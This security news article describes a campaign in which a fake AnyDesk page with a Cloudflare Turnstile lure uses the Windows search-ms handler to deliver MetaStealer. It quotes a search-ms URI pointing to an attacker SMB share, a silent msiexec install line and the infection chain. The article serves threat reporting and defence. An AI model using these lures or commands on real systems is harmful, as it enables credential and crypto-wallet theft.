New ClickFix Attack Mimic as AnyDesk Leverages Windows Search to Drop MetaStealer

A novel variant of the ClickFix attack has recently emerged, masquerading as a legitimate AnyDesk installer to spread the MetaStealer infostealer.

This campaign exploits a fake Cloudflare Turnstile verification page to lure victims into executing a crafted Windows protocol handler, ultimately delivering a malicious MSI package disguised as a PDF.

As organizations continue to harden their defenses against traditional social-engineering techniques, threat actors are evolving their playbooks, blending familiar lures with unexpected system components to bypass detection and steal sensitive credentials.

In early August, users searching for the AnyDesk remote access tool encountered a deceptive landing page at anydeesk[.]ink/download/anydesk.html.

The page displayed what appeared to be a standard Cloudflare Turnstile prompt, complete with a “verify you are human” button.

Upon clicking, victims were not guided to paste a command into the Run dialog box as in classic ClickFix attacks but instead redirected into Windows File Explorer via the search-ms URI handler.

Huntress researchers noted that this subtle shift in redirection mechanism capitalized on the lesser-monitored Windows Search protocol, catching security teams off-guard.

The infection chain unfolds when the search-ms URI invokes a remote SMB share, delivering a Windows shortcut file named “Readme Anydesk.pdf.lnk” to the victim’s system.

Unlike FileFix variants that rely on clipboard-pasted PowerShell commands, this attack automatically launches the LNK payload, which in turn executes a script to download and install two components: the genuine AnyDesk installer hosted on Microsoft Edge for plausibility, and a decoy PDF served from chat1[.]store.

The decoy file is in fact an MSI package that dynamically incorporates the victim’s hostname into its download URL by leveraging the %COMPUTERNAME% environment variable. Once downloaded, the MSI is installed via:-

msiexec /i "%TEMP%%%COMPUTERNAME%%.msi" /quiet

After this command completes, metadata reveals two primary artifacts: a CustomActionDLL responsible for orchestrating the setup and a CAB archive containing ls26.exe, the MetaStealer dropper, and cleanup scripts.

Huntress analysts identified that ls26.exe is protected with Private EXE Protector and exhibits characteristic behaviors of MetaStealer, including credential harvesting from browsers and crypto-wallet theft.

Infection Mechanism

At the heart of this campaign lies the ingenious use of Windows Search. By invoking the search-ms URI protocol, attackers bypass the Run dialog restrictions in hardened environments and introduce payloads directly through File Explorer.

The following URI snippet illustrates the redirection:-

search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\attacker-smbshare

Once the user confirms the File Explorer prompt, the LNK file silently executes the download routines. The MSI’s CustomActionDLL then triggers the retrieval of Binary.bz.WrappedSetupProgram, which unpacks ls26.exe and 1.js.

The JavaScript file ensures the removal of intermediary files, while ls26.exe initiates the data exfiltration phase.

By abusing legitimate Windows protocols and file handling, this attack evades sandbox detection and security alerts until the final payload unleashes its malicious logic.

This emerging tactic underscores the importance of monitoring unconventional extensions of trusted system features.

Defenders should consider implementing strict protocol handler policies, SMB auditing, and contextual analysis of MSI installations to detect and disrupt these sophisticated social-engineering campaigns.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.